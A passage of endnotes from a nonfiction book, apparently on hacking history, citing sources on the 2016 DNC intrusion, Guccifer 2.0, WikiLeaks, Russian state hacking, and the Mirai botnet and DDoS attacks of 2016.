“And I took every call”: “Interview of Yared Tamene Wolde-Yohannes,” 12. Tamene clarified that sometimes he did not return Hawkins’s voice mails because Hawkins always called back. “So I actually never got a situation where—I think I might have gotten some missed calls from him, but I never called him myself directly. And that wasn’t me trying to be coy or anything like that. It was simply a matter of timing. And so, if I missed his call, he would call back and I would talk to him,” 14.
could not verify it: In December, Tamene requested budgetary approval to buy a more sophisticated firewall to see if he could catch the traffic that the FBI was seeing. He ordered the firewall from Palo Alto Networks in part because of their article he had read about the Dukes. The firewall was installed in February and turned on in March. “Interview of Yared Tamene Wolde-Yohannes,” 13.
When Hawkins and Tamene finally met: “Interview of Yared Tamene Wolde-Yohannes,” 17.
After securing legal clearance: “Interview of Yared Tamene Wolde-Yohannes,” 22.
The metadata was sent over on April 29: “Interview of Yared Tamene Wolde-Yohannes,” 23.
On April 28: “Interview of Yared Tamene Wolde-Yohannes,” 24.
“We’ve had an intrusion”: Greg Miller, The Apprentice: Trump, Russia, and the Subversion of American Democracy, 43 (New York: Custom House, 2018).
“The security of our system is critical”: Ellen Nakashima, “Russian Government Hackers Penetrated DNC, Stole Opposition Research on Trump,” The Washington Post, June 14, 2016.
Even when CrowdStrike had confirmed: “Interview of Shawn Henry,” 26.
the Democratic Party: The DNC’s delay was costly. Between May 25 and June 1, Fancy Bear hacked the DNC corporate server and stole thousands of emails: United States of America v. Defendants, 11.
basic details: Edward Snowden, Permanent Record (New York: Farrar, Straus and Giroux, 2019).
Snowden files: See generally Barton Gellman, Dark Mirror: Edward Snowden and the American Surveillance State (New York: Penguin Press, 2020).
states are permitted: See, e.g., Asaf Lubin, “The Liberty to Spy,” Harvard International Law Journal 61 (2020): 185.
Angela Merkel’s cell phone: “German Magazine: NSA Spied on United Nations,” CBS News, August 26, 2013, https://www.cbsnews.com/news/german-magazine-nsa-spied-on-united-nations/.
Executive Order 12333: The White House, Executive Order 12333: United States Intelligence Activities, 46 Fed. Reg. 59,941 (Dec. 4, 1981), as amended by Executive Order 13284, 68 Fed. Reg. 4,077 (Jan. 23, 2003), and by Executive Order 13355 and further amended by Executive Order 13470, 73 Fed. Reg. 45,328 (2008).
Obama apologized: David E. Sanger, “Obama Panel Said to Urge NSA Curbs,” The New York Times, December 12, 2013.
BND: Maik Baumgärtner, Martin Knobbe, and Jörg Schindler, “BND schnüffelte auch im Weißen Haus” [BND Also Snooped in the White House], Der Spiegel, June 22, 2017, https://www.spiegel.de/politik/ausland/bundesnachrichtendienst-schnueffelte-im-weissen-haus-a-1153306.html.
“organized hypocrisy”: Stephen Krasner, Sovereignty: Organized Hypocrisy (Princeton, NJ: Princeton University Press, 1999).
Russian hacking of the United States: The first known hacking operation conducted by the Russian Federation against the United States began in 1996. The FBI investigation to uncover the hacks was called Moonlight Maze. Newsweek staff, “We Are in the Middle of a Cyberwar,” Newsweek, September 19, 1999, https://www.newsweek.com/were-middle-cyerwar-166196. See also Fred Kaplan, Dark Territory: The Secret History of Cyber War (New York: Simon and Schuster, 2016), 78–88; Juan Andres Guerrero-Saade et al., “Penquin’s Moonlit Maze: The Dawn of Nation-State Digital Espionage,” Securelist, Kaspersky Lab, April 3, 2017, https://ridt.co/d/jags-moore-raiu-rid.pdf.
Russia infiltrated the State Department’s: Ellen Nakashima, “New Details Emerge about 2014 Russian Hack of the State Department: It Was ‘Hand to Hand Combat,’” The Washington Post, October 3, 2017; Michael S. Schmidt and David E. Sanger, “Russian Hackers Read Obama’s Unclassified Emails, Officials Say,” The New York Times, April 25, 2015.
White House’s unclassified network: Ellen Nakashima, “Hackers Breach Some White House Computers,” The Washington Post, October 28, 2014.
Pentagon’s unclassified system: Jamie Crawford, “Russians Hacked Pentagon Network, Carter Says,” CNN, June 4, 2015, https://www.cnn.com/2015/04/23/politics/russian-hackers-pentagon-network/index.html.
Joint Chiefs of Staff: Craig Whitlock and Missy Ryan, “U.S. Suspects Russia in Hack of Pentagon Computer Network,” The Washington Post, August 6, 2015.
On Tuesday, June 14: Nakashima, “Russian Government Hackers.”
To corroborate Nakashima’s bombshell: Dmitri Alperovitch, “Bears in the Midst: Intrusion into the Democratic National Committee,” June 14, 2016, in “CrowdStrike’s Work with the Democratic National Committee.”
Lehel chose the handle: Andrew Higgins, “For Guccifer, Hacking Was Easy. Prison Is Hard,” The New York Times, November 10, 2014.
In 2013, Guccifer hacked: “Hacker Targets Clinton Confidant in New Attack,” The Smoking Gun, March 15, 2013, http://www.thesmokinggun.com/documents/sidney-blumenthal-email-hack-687341. When he was released on parole in 2018, Guccifer was extradited to the United States, where he is currently serving a fifty-two-month sentence in federal prison.
The first blog entry: “Guccifer 2.0: DNC’s Servers Hacked by a Lone Hacker,” Guccifer2.0.wordpress, June 15, 2016, https://guccifer2.wordpress.com/2016/06/15/dnc/.
posted numerous pilfered documents: “Emails Guccifer 2.0 claimed were DNC documents when he released them on June 15 came, instead, from John Podesta. It wasn’t until July 6 that the Guccifer 2.0 documents billed as DNC ones actually were.” “2016: Guccifer 2 and the Podesta Emails,” The Llama Files, May 28, 2017, https://jimmysllama.com/2017/05/28/9867/.
attached to an exfiltrated Podesta email: https://WikiLeaks.org/podesta-emails/emailid/26562.
Records attached to another: Spreadsheet attached to Podesta email: https://WikiLeaks.org/podesta-emails/emailid/3016.
Both media outlets: Sam Biddle and Gabrielle Bluestone, “This Looks Like the DNC’s Hacked Trump Oppo File,” Gawker, June 15, 2016, https://gawker.com/this-looks-like-the-dncs-hacked-trump-oppo-file-1782040426; “DNC Hacker Releases Trump Oppo Report,” The Smoking Gun, June 15, 2016, http://www.thesmokinggun.com/documents/crime/dnc-hacker-leaks-trump-oppo-report-647293. Trump responded that the DNC hacked itself. John Santucci (@Santucci), “New Trump Statement on Gawker,” Twitter, June 15, 2016, https://twitter.com/Santucci/status/743194156739108865. Guccifer 2.0 told the editor of The Smoking Gun: “I sent a big part of docs to WikiLeaks.” See Raffi Khatchadourian, “What the Latest Mueller Indictment Reveals About WikiLeaks’ Ties to Russia—and What It Doesn’t,” The New Yorker, July 24, 2018, https://www.newyorker.com/news/newsdesk/what-the-latest-mueller-indictment-reveals-about-WikiLeaks-ties-to-russia-and-what-it-doesnt.
“I’m a hacker, manager, philosopher, woman lover”: Lorenzo Franceschi-Bicchierai, “Here’s the Full Transcript of Our Interview with DNC Hacker ‘Guccifer 2.0,’” Motherboard, Vice, June 21, 2016, https://www.vice.com/en/article/yp3bbv/dnc-hacker-guccifer-20-full-interview-transcript.
urged Guccifer: United States of America v. Defendants, 17–18.
On July 18: United States of America v. Defendants, 18.
@WikiLeaks tweeted: WikiLeaks (@WikiLeaks), “RELEASE: 19,252 Emails from the US Democratic National Committee,” Twitter, July 22, 2016, https://twitter.com/WikiLeaks/status/756501723305414656.
searchable database: Database of DNC emails: https://WikiLeaks.org//dnc-emails/. The web page announced, “Today, Friday 22 July 2016 at 10:30am EDT, WikiLeaks releases 19,252 emails and 8,034 attachments from the top of the US Democratic National Committee—part one of our new Hillary Leaks series.” Tom Hamburger and Karen Tumulty, “WikiLeaks Releases Thousands of Documents About Clinton and Internal Deliberations,” The Washington Post, July 22, 2016. At present, the website boasts 44,053 emails and 17,761 attachments, from the accounts of seven key figures in the DNC: Communications Director Luis Miranda (10,520 emails), National Finance Director Jordon Kaplan (3,799 emails), Finance Chief of Staff Scott Comer (3,095 emails), Finance Director of Data and Strategic Initiatives Daniel Parrish (1,742 emails), Finance Director Allen Zachary (1,611 emails), Senior Adviser Andrew Wright (938 emails), and Northern California Finance Director Robert (Erik) Stowe (751 emails). The emails cover the period from January 1, 2015, to May 25, 2016.
on his atheism: Email: https://WikiLeaks.org/dnc-emails/emailid/7643. See also Michelle Boorstein and Julie Zauzmer, “WikiLeaks: Democratic Party Officials Appear to Discuss Using Sanders’s Faith Against Him,” The Washington Post, July 22, 2016.
“I told you a long time ago”: Hayley Walker, “Bernie Sanders Calls for Debbie Wasserman Schultz to Resign in Wake of Email Leaks,” ABC News, July 24, 2016, https://abcnews.go.com/ThisWeek/bernie-sanders-calls-wasserman-schultz-resign-wake-dnc/story?id=40824983.
toothpaste back in the tube: Elizabeth Jensen, “How Should NPR Report on Hacked WikiLeak Emails?,” NPR, https://www.npr.org/sections/publiceditor/2016/10/19/498444943/how-should-npr-report-on-hacked-wikileaks-emails. See generally, Nieman Reports, “When Is It Ethical to Publish Stolen Data?,” Nieman Reports, https://niemanreports.org/articles/when-is-it-ethical-to-publish-stolen-data/.
the next day: Donald Trump (@realDonaldTrump), “Leaked e-mails of DNC show plans to destroy Bernie Sanders,” Twitter, July 23, 2016, https://twitter.com/realDonaldTrump/status/756804886038192128.
from Russia: Alex Johnson, “WikiLeaks’ Julian Assange: ‘No Proof’ Hacked DNC Emails Came from Russia,” NBC News, July 25, 2016, https://www.nbcnews.com/news/us-news/WikiLeaks-julian-assange-no-proof-hacked-dnc-emails-came-russia-n616541.
inside job: Interview with Amy Goodman, “WikiLeaks’ Julian Assange on Releasing DNC Emails That Ousted Debbie Wasserman Schultz,” July 25, 2016, https://www.democracynow.org/2016/7/25/exclusive_WikiLeaks_julian_assange_on_releasing.
“I mean, it could be”: First presidential debate of 2016, CNN, September 26, 2016, http://www.cnn.com/TRANSCRIPTS/1609/26/se.01.html.
“Guccifer 2.0”: Roger Stone, “Dear Hillary: DNC Hack Solved, So Now Stop Blaming Russia,” Breitbart.com, August 5, 2016, https://www.breitbart.com/politics/2016/08/05/dear-hillary-dnc-hack-solved-so-now-stop-blaming-russia/.
no previous online presence: Lorenzo Franceschi-Bicchierai, “‘Guccifer 2.0’ Is Likely a Russian Government Attempt to Cover Up Its Own Hack,” Vice, June 16, 2016, https://www.vice.com/en_us/article/wnxgwq/guccifer-20-is-likely-a-russian-government-attempt-to-cover-up-their-own-hack.
“That’s how a blown operation”: thaddeus t. grugq, “The Russian Way of Cyberwar: Information, Disinformation and Influence,” Medium, January 10, 2017, https://medium.com/@thegrugq/the-russian-way-of-cyberwar-edb9d52b4876.
anomalies quickly emerged: Some analysts initially suspected that these anomalies were intentional feints. See, e.g., “On Metadata and Manipulation: The First Guccifer 2.0 Documents,” emptywheel, November 3, 2017, https://www.emptywheel.net/2017/11/03/on-metadata-and-manipulation-the-first-guccifer-2–0-documents/?print=print.
files had been doctored: Haley Byrd, “This Former British Spy Exposed the Russian Hackers,” The Washington Examiner, July 25, 2018, https://www.washingtonexaminer.com/weekly-standard/this-former-british-spy-exposed-the-russian-hackers.
no evidence of tampering: In one instance, Guccifer 2.0 posted an old document (metadata suggesting 2008) leaked by the original Guccifer in 2013, but superimposed a “Secret” watermark on the document, instead of the original “Confidential.” See Thomas Rid (@RidT), “We know this because that file was already leaked in 2013, as ‘confidential,’ not secret—by the original Guccifer,” Twitter, November 3, 2017, https://twitter.com/RidT/status/926597748379570176.
pirated version of Microsoft Office: Florian Wagner, @_fl01, “Get it;),” Twitter, June 15, 2016, https://twitter.com/_fl01/status/743226251373060097.
Secureworks found: “Between October 2015 and May 2016, CTU researchers analyzed 8,909 Bitly links that targeted 3,907 individual Gmail accounts and corporate and organizational email accounts that use Gmail as a service”: Secureworks Counter Threat Unit, “Threat Group-4127 Targets Hillary Clinton Presidential Campaign,” Secureworks, June 16, 2016, https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign; “CTU researchers analyzed 4,396 phishing URLs sent to 1,881 Google Accounts between March and September, 2015”: Secureworks Counter Threat Unit, “Threat Group–4127 Targets Google Accounts,” Secureworks, June 26, 2016, https://www.secureworks.com/research/threat-group-4127-targets-google-accounts. The AP subsequently examined 19,000 links from Secureworks’s database covering March 2015 to May 2016. Raphael Satter et al., “Russian Hackers Pursued Putin Foes, Not Just US Democrats,” Associated Press, November 2, 2017, https://apnews.com/article/technology-entertainment-music-russia-hacking-3bca5267d4544508bb523fa0db462cb2.
to rent the proxy servers: On April 12, 2016, Fancy Bear paid $37 worth of Bitcoin to the Romanian web-hosting service THCServers.com: Satter, Donn, and Day, “Inside Story.” This company runs “bulletproof” servers, so named because THCServers refuses to cooperate with law enforcement. The Romanian company ignores state requests for information.
Professor Thomas Rid: Thomas Rid, @RidT, “.@pwnallthethings Remarkably the same C2 IP,” Twitter, July 8, 2016, https://twitter.com/ridt/status/751325844002529280. In addition to being a participant in the story, Professor Rid has written a terrific account of the hacks from which I have learned a great deal. Thomas Rid, Active Measures: The Secret History of Disinformation and Political Warfare (New York: Farrar, Straus and Giroux, 2020), 377–96.
Germany’s intelligence service: BBC News, “Russia ‘Was Behind German Parliament Hack,’” May 13, 2016, https://www.bbc.com/news/technology-36284447.
same security certificates: Thomas Rid, @RidT, “.@pwnallthethings This SSL certificate,” Twitter, July 11, 2016, https://twitter.com/RidT/status/752528393678225408.
Guccifer 2.0’s true identity: Kevin Poulsen and Spencer Ackerman, “‘Lone DNC Hacker’ Guccifer 2.0 Slipped Up and Revealed He Was a Russian Intelligence Officer,” The Daily Beast, https://www.thedailybeast.com/exclusive-lone-dnc-hacker-guccifer-20-slipped-up-and-revealed-he-was-a-russian-intelligence-officer.
Putin answered: “Putin Discusses Trump, OPEC, Rosneft, Brexit, Japan (Transcript),” Bloomberg, September 5, 2016, https://www.bloomberg.com/news/articles/2016-09-05/putin-discusses-trump-opec-rosneft-brexit-japan-transcript.
Hillary Clinton’s support for: Putin has reportedly blamed Hillary Clinton for instigating mass protests against him in 2011. Miriam Elder, “Vladimir Putin Accuses Hillary Clinton of Encouraging Russian Protests,” The Guardian, December 8, 2011.
Putin’s desire for revenge: Mike Eckel, “Clinton Calls for Tougher Response to Russia on Ukraine, Syria,” September 9, 2015, Radio Free Europe, https://www.rferl.org/a/russia-us-clinton-calls-for-tougher-response-on-ukraine-syria/27235800.html; Amy Chozick, “Clinton Says ‘Personal Beef’ by Putin Led to Hacking Attacks,” The New York Times, December 16, 2016. The Intelligence Community report later concluded that Russia was trying “to help President-elect Trump’s election chances when possible by discrediting Secretary Clinton and publicly contrasting her unfavorably to him”: Intelligence Community Assessment, “Assessing Russian Activities and Intentions in Recent US Elections,” United States Senate, January 6, 2017, ii, https://www.intelligence.senate.gov/sites/default/files/documents/ICA_2017_01.pdf. The report also noted that the CIA and the FBI had high confidence in this judgment; NSA had moderate confidence.
2016 election: Sam Biddle, “A Swing-State Election Vendor Repeatedly Denied Being Hacked by Russians. The New Mueller Indictment Says Otherwise,” The Intercept, July 13, 2018, https://theintercept.com/2018/07/13/a-swing-state-election-vendor-repeatedly-denied-being-hacked-by-russians-new-mueller-indictment-says-otherwise/.
“where it will end up”: David E. Sanger, The Perfect Weapon: War, Sabotage, and Fear in the Cyber Age (New York: Crown, 2018), 224.
weaponize it: Hackers call this type of operation “hack-and-leak.” Gabriella Coleman has termed it a public interest hack: “a hack that will interest the public due to the hack and the data/documents.” Coleman claims that the hacktivist collective known as Anonymous innovated the public-interest hack around 2007: Gabriella Coleman, “The Public Interest Hack,” Limn, 2017, https://limn.it/articles/the-public-interest-hack.
released the memo: “Joint Statement from the Department of Homeland Security and Office of the Director of National Intelligence on Election Security,” October 7, 2016, https://www.dhs.gov/news/2016/10/07/joint-statement-department-homeland-security-and-office-director-national.
Putin’s name: The Intelligence Community Assessment, later posted on January 6, 2017, did name Putin: “We assess Russian President Vladimir Putin ordered an influence campaign in 2016 aimed at the US presidential election”: Intelligence Community Assessment, “Assessing Russian Activities,” ii.
Trump’s political advisers: Stephen Bannon testified before the Senate Select Committee on Intelligence that Trump’s debate preparation team first heard of the tape about an hour prior to its public release. See Select Committee on Intelligence, United States Senate, on Russian Active Measures Campaigns and Interference in the 2016 U.S. Election, vol. 5: Counterintelligence Threats and Vulnerabilities, 249, citing Bannon testimony before the Select Committee on November 19, 2018, 206.
Roger Stone instructed: Select Committee on Intelligence, 249–50.
“wanted to see the Podesta emails”: Select Committee on Intelligence, 249.
new emails from the Podesta inbox each day: WikiLeaks released a second batch of DNC emails on November 7, 2016, a day before the election, adding 8,263 emails to its collection: Joe Uchill, “WikiLeaks Releases New DNC Emails Day Before Election,” The Hill, November 7, 2016, https://thehill.com/policy/cybersecurity/304648-WikiLeaks-releases-new-dnc-emails-suffers-cyberattack/.
only make us feel safer: Bruce Schneier, Beyond Fear: Thinking Sensibly About Security in an Uncertain World (New York: Copernicus Books, 2003).
from blowing it up: Bruce Schneier, “Is Aviation Security Mostly for Show?,” CNN, December 29, 2009, http://edition.cnn.com/2009/OPINION/12/29/schneier.air.travel.security.theater/.
“precisely calibrated attacks”: Bruce Schneier, “Someone Is Learning How to Take Down the Internet,” Lawfare, September 13, 2016, https://www.lawfareblog.com/someone-learning-how-take-down-internet.
DDoS: Schneier, “Someone Is Learning.”
processing legitimate requests: “What Is a DDoS Attack,” Cloudflare Learning Center, accessed February 24, 2021, www.cloudflare.com/learning/ddos/what-is-a-ddos-attack.
for three weeks: Ian Traynor, “Russia Accused of Unleashing Cyberwar to Disable Estonia,” The Guardian, May 16, 2007, https://www.theguardian.com/world/2007/may/17/topstories3.russia.
same basic technique: Episode 13, “The Blueprint,” written and directed by John Marks, The Weekly, from The New York Times, aired September 8, 2019, on Hulu, https://www.nytimes.com/2019/09/06/the-weekly/russia-estonia-election-cyber-attack.html.
“One week, the attack”: Schneier, “Someone Is Learning.”
“It doesn’t seem like”: Schneier, “Someone Is Learning.”
map their capabilities: Schneier, “Someone Is Learning.”
same period in 2015: Akamai Technologies, “Akamai Releases Second Quarter 2016 State of the Internet / Security Report,” Cision PR Newswire, September 14, 2016, https://www.prnewswire.com/news-releases/akamai-releases-second-quarter-2016-state-of-the-internet-security-report-300327400.html. Verisign reported a 75 percent increase during the same period: “Verisign Q2 2016 DDOS Trends: Layer 7 DDOS Attacks a Growing Trend,” Verisign (blog), August 29, 2016, https://blog.verisign.com/security/verisign-q2-2016-ddos-trends-layer-7-ddos-attacks-a-growing-trend/.
“It’s a total Wild”: Nicole Perlroth, “Hackers Used New Weapons to Disrupt Major Websites Across U.S.,” The New York Times, November 2, 2016.
“What can we do”: Schneier, “Someone Is Learning.”
cloud computing provider OVH: Octave Klaba (@olesovhcom), “Last days, we got lot of huge DDoS,” Twitter, September 22, 2016, https://twitter.com/olesovhcom/status/778830571677978624?s=20&t=EF2RadOIKuBH5Gdb8x5DUw.
1.2 terabits: Octave Klaba (@olesovhcom), “@Dominik28111 we got 2 huge multi DDoS,” Twitter, September 19, 2016, https://twitter.com/olesovhcom/status/778019962036314112.
personal video recorders: Swati Khandelwal, “World’s Largest 1 Tbps DDoS Attack Launched from 152,000 Hacked Smart Devices,” Hacker News, September 28, 2016, thehackernews.com/2016/09/DDoS-attack-iot.html.
any of its rivals: One prominent rival, the vDOS botnet, advertised their rate as “up to 50 gigabits per second”: Brian Krebs, “Israeli Online Attack Service ‘vDOS’ Earned $600,000 in Two Years,” Krebs on Security, September 8, 2016, https://krebsonsecurity.com/2016/09/israeli-online-attack-service-vdos-earned-600000-in-two-years/.
largest cloud provider in Europe: Matthew Gooding, “Is Europe’s OVHcloud Ready to Take on the US Cloud Hyperscalers?,” Tech Monitor, September 21, 2021, https://techmonitor.ai/technology/cloud/ovhcloud-ipo-cloud-computing-aws-azure.
stir up this kind of trouble?: Some noted that OVH had one controversial client: WikiLeaks. Their hosting of WikiLeaks sparked speculation that a nation-state, such as the United States, was trying to silence Julian Assange for his interference in its election. France even demanded that OVH shut WikiLeaks down: Josh Halliday and Angelique Chrisafis, “WikiLeaks: France Adds to US Pressure to Ban Website,” The Guardian, December 3, 2010.
Krebs on Security: Brian Krebs, “Krebs on Security Hit with Record DDoS,” Krebs on Security, September 21, 2016, https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/.
massive retaliation: When Krebs broke the story about the theft of 40 million credit cards from the retailing giant Target in 2013, the Ukrainian mastermind behind the black market for credit card fraud not only DDoSed Krebs’s website, but also called 911 with a spoof emergency report to make it appear as though it came from Krebs’s house. SWATting, as it is known, aims to unleash deadly force on a victim by calling the police and reporting a violent crime in action—usually a bomb threat or a hostage situation. A heavily armed team of local police showed up at Krebs’s house in suburban Fairfax, Virginia, apprehended Krebs, and put him in handcuffs before the journalist could convince them that it was a hoax: Brian Krebs, “The World Has No Room for Cowards,” Krebs on Security, March 15, 2013, krebsonsecurity.com/2013/03/the-world-has-no-room-for-cowards.
between 2012 and 2016: Elie Bursztein, “Inside the Infamous Mirai IoT Botnet: A Retrospective Analysis,” Cloudflare Blog, December 14, 2017, blog.cloudflare.com/inside-mirai-the-infamous-iot-botnet-a-retrospective-analysis.
take out a simple blog: Bursztein, “Inside the Infamous Mirai.”
crusading against cybercrime: Hiawatha Bray, “Akamai Breaks Ties with Security Expert,” The Boston Globe, September 23, 2016.
made them vanish: Eli Blumenthal and Elizabeth Weise, “Hacked Home Devices Caused Massive Internet Outage,” USA Today, October 21, 2016.
make sense of them: “Oracle DNS,” Oracle, accessed February 28, 2022, www.oracle.com/cloud/networking/dns.
began at 9:30 a.m.: Scott Hilton, “Dyn Analysis Summary of Friday October 21 Attack,” Dyn, October 26, 2016, https://web.archive.org/web/20161101171641/http:/dyn.com/blog/dyn-analysis-summary-of-friday-october-21-attack/.
“This was not your”: Nicole Perlroth, “Hackers Used New Weapons to Disrupt Major Websites Across U.S.,” The New York Times, October 21, 2016.
voting technology standards: Perlroth, “Hackers Used New Weapons.”
internet outage map on Twitter: WikiLeaks (@WikiLeaks), “Mr. Assange is still alive,” Twitter, October 21, 2016, https://twitter.com/WikiLeaks/status/789574436219449345?ref_src=twsrc%5Etfw. The map is from DownDetector, a platform that provides information on service issues. See Blumenthal and Weise, “Hacked Home Devices.”
Julian Assange’s internet connection: WikiLeaks claims that Ecuador shut off Assange’s internet after WikiLeaks published Clinton’s Goldman Sachs speeches on October 16: WikiLeaks (@WikiLeaks), “We can confirm Ecuador cut off Assange’s internet access Saturday, 5pm GMT, shortly after publication of Clinton’s Goldman Sachs speechs,” Twitter, October 17, 2016, https://twitter.com/WikiLeaks/status/788099178832420865. See also Mathew J. Schwartz, “Ecuador Kiboshes WikiLeaks Leader’s Internet Connection,” Data Breach Today, October 19, 2016, www.databreachtoday.com/blogs/ecuador-kiboshes-WikiLeaks-leaders-internet-connection-p-2289. See also Eric Geller and Tony Romm, “WikiLeaks Supporters Claim Credit for Massive U.S. Cyberattack, but Researchers Skeptical,” Politico, October 21, 2016, https://www.politico.com/story/2016/10/websites-down-possible-cyber-attack-230145.
launch a cyberwar?: White House spokesperson responded, “I know the Department of Homeland Security … is monitoring this situation, and they’ll take a close look at it”: Eric Geller (@ericgeller), “At briefing just now, @PressSec said DHS was monitoring the Dyn DDoS,” Twitter, October 21, 2016, https://twitter.com/ericgeller/status/789501608904257536?s=21.
first DDoS attack: See Garrett Graff, “How a Dorm Room Minecraft Scam Brought Down the Internet,” Wired, December 13, 2017, www.wired.com/story/mirai-botnet-minecraft-scam-brought-down-the-internet; “Computer Hacker Who Launched Attacks on Rutgers University Ordered to Pay $8.6m Restitution; Sentenced to Six Months Home Incarceration,” Department of Justice, Office of Public Affairs, October 26, 2018, https://www.justice.gov/usao-nj/pr/computer-hacker-who-launched-attacks-rutgers-university-ordered-pay-86m-restitution; Katie Park, “Police Investigate Rutgers Cyber Attack,” The Daily Targum, November 23, 2014, dailytargum.com/article/2014/11/police-investigate-rutgers-cyber-attack.
Paras’s classmates: Park, “Police Investigate Rutgers.”
2.3 percent tuition increase: Kelly Heyboer, “Who Hacked Rutgers? University Spending Up to $3M to Stop Next Cyber Attack,” NJ, August 23, 2015, www.nj.com/education/2015/08/who_hacked_rutgers_university_spending_up_to_3m_to.html.
delay his calculus exam: United States District Court for the Court of Alaska, United States of America v. Paras Jha, Sentencing Memo, September 11, 2018, 20, https://regmedia.co.uk/2018/09/20/mirai.pdf.
precisely 8:15 p.m.: Lauren Niesz, “Online Hack Attacks: Is ‘MU-SECURE’?,” The Outlook, April 29, 2015, outlook.monmouth.edu/news/30-volume-86-fall-2014-spring-2015/2589-online-hack-attacks-is-mu-secure.
another assault on Rutgers: Katie Park, “Rutgers Network Crumples Under Siege by DDoS Attack,” The Daily Targum, March 30, 2015, https://dailytargum.com/article/2015/03/rutgers-network-crumples-under-siege-by-ddos-attack.
a friend later reported: Brian Krebs, “Who Is Anna-Senpai, the Mirai Worm Author?,” Krebs on Security, January 18, 2017, krebsonsecurity.com/2017/01/who-is-anna-senpai-the-mirai-worm-author.
conceal his identity: The post is here: “@Rutgers Community,” Pastebin, April 29, 2015, pastebin.com/9d0vRep8. Brian Krebs connected the post to Paras. See Krebs, “Who Is Anna-Senpai?”
fourth attack on the Rutgers: Kelly Heyboer, “Who Hacked Rutgers: University Spending up to $3M to Stop Next Cyber Attack,” NJ.Com, August 23, 2015, https://www.nj.com/education/2015/08/who_hacked_rutgers_university_spending_up_to_3m_to.html.
ProTraf Solutions: According to the Wayback Machine, ProTraf Solutions had a Web presence on March 4, 2015, the date of the second DDoS attack. See web.archive.org/web/20150304050230/http://www.ProTrafsolutions.com/clientarea.php.
ProTraf over Incapsula: Krebs, “Who Is Anna-Senpai?”
the only provider: See, e.g., Federico Varese, Mafias on the Move: How Organized Crime Conquers New Territory (Princeton, NJ: Princeton University Press, 2011).
she gasped: 30 Rock, season 5, episode 3.
rackets on their subjects: Charles Tilly, Coercion, Capital, and European States, AD 990–1992 (Cambridge: Basil Blackwell, 1990), 68–70.
“making it criminal”: Tilly, Coercion, Capital, 69.
their own making: Tilly, Coercion, Capital, 69–70.
Central New Jersey: Alexis Tarrazi, “Fanwood Man Responsible for Rutgers University Hack Pleads Guilty,” Patch, December 13, 2017, https://patch.com/new-jersey/scotchplains/fanwood-man-responsible-rutgers-university-hack-pleads-guilty.
bullied by other children: U.S. District Court for the Court of Alaska, United States of America v. Paras Jha, Sentencing Memo, September 11, 2018, 11, https://regmedia.co.uk/2018/09/20/mirai.pdf.
he was transfixed: Sentencing Memo, 10–12.
would have helped him: Sentencing Memo, 12–13.
pushed him even harder: Sentencing Memo, 13–14.
he was twelve and was hooked: According to Paras, “My first reaction to programming was, ‘Look what I can do!’”: Paras Jha, “I Am Paras Jha,” Internet Archive, accessed June 13, 2021, web.archive.org/web/20140122005106/http://parasjha.info. This website claims that Paras learned to code in eighth grade, but in the Wired story, Graff, “How a Dorm Room,” Paras is said to have learned how to code in seventh grade (based on his old LinkedIn page). On his current LinkedIn, Paras said he learned to code when he was twelve: https://www.linkedin.com/in/parasjha.
success and affirmation: Sentencing Memo, 15.
exhibit his work: Krebs, “Who Is Anna-Senpai?”
since buying the game in 2014: “Minecraft for Windows,” Minecraft, accessed February 27, 2022, https://www.minecraft.net/en-us/store/minecraft-windows10.
55 million users play it: Tom Warren, “Minecraft Still Incredibly Popular as Sales Top 200 Million and 126 Million Play Monthly,” Verge, May 18, 2020, www.theverge.com/platform/amp/2020/5/18/21262045/minecraft-sales-monthly-players-statistics-youtube. This is up from the 100 million Warren reported in 2016: Tom Warren, “Minecraft Sales Top 100 Million,” Verge, June 2, 2016, www.theverge.com/2016/6/2/11838036/minecraft-sales-100-million.
$100,000 a month: Graff, “How a Dorm Room.” Note that Krebs claims $50,000/month: https://krebsonsecurity.com/2017/01/who-is-anna-senpai-the-mirai-worm-author/.
“seeing others enjoy my work”: Jha, “I Am Paras Jha.”
DDoS attacks: Sentencing Memo, 16.
launch these attacks themselves: Sentencing Memo, 17.
“But for the server operators”: Krebs, “Who Is Anna-Senpai?”
targets of these attacks: Sentencing Memo, 18.
attacks on Minecraft servers: Krebs, “Who Is Anna-Senpai?”
his personal website: Jha, “I Am Paras Jha.” Note that ProTraf’s early iteration was called Switchnet.
“ever since 2009”: “About Us|ProTraf Solutions,” ProTraf, Internet Archive, accessed June 13, 2021, web.archive.org/web/20160528163331/https://www.ProTrafsolutions.com/about.
Minecraft DDoS experts: Sentencing Memo, 15, 18–19.
put on academic probation: Sentencing Memo, 20.
“States make war and vice versa”: Tilly, Coercion, Capital, 67.
revenues dwindle: Tilly, Coercion, Capital, 67.
gang known as VDoS: Krebs, “Israeli Online Attack Service.”
providing these services for four years: Krebs, “Israeli Online Attack Service.”
from Israel in 2012: Brian Krebs, “Alleged VDOS Proprietors Arrested in Israel,” Krebs on Security, September 10, 2016, https://krebsonsecurity.com/2016/09/alleged-vdos-proprietors-arrested-in-israel.
Denial of Service attacks: Single computers might take out a website if they use a “reflection” attack. See generally Todd Booth and Karl Andersson, “Network Security of Internet Services: Eliminate DDoS Reflection Amplification Attacks,” Journal of Internet Services and Information Security 5, no. 3 (2015), 58–79.
murderous organization’s website: Tim Lee, “The New York Times Web Site Was Taken Down by DNS Hijacking. Here’s What That Means,” The Washington Post, August 27, 2013.
distributed zombie computers: Ellen Messmer, “Experts Link Flood of ‘Canadian Pharmacy’ Spam to Russian Botnet Criminals,” The New York Times, July 16, 2009.
over three years: Brian Krebs, “Top Spam Botnet, ‘Grum,’ Unplugged,” Krebs on Security, July 19, 2012, krebsonsecurity.com/2012/07/top-spam-botnet-grum-unplugged; Brian Krebs, “Who’s Behind the World’s Largest Spam Botnet?,” Krebs on Security, February 1, 2012, http://krebsonsecurity.com/2012/02/whos-behind-the-worlds-largest-spam-botnet.
issuing orders: Two main kinds of botnets are Server-Client, where the botmaster directly controls the bots through a C2, and Peer-to-Peer, where the botmaster uses the bots themselves to relay orders. See generally Basheer Al-Duwairi and Moath Jarrah, “Botnet Architectures: A State-of-the-Art Review,” in Botnets: Architectures, Countermeasures, and Challenges, ed. Georgios Kambourakis et al. (Boca Raton, FL: CRC Press, 2020), 10–18.
Himalayan Kingdom of Bhutan: James Wyke, “Over 9 Million PCs Infected—ZeroAccess Botnet Uncovered,” Naked Security, September 19, 2012, https://nakedsecurity.sophos.com/2012/09/19/zeroaccess-botnet-uncovered/.
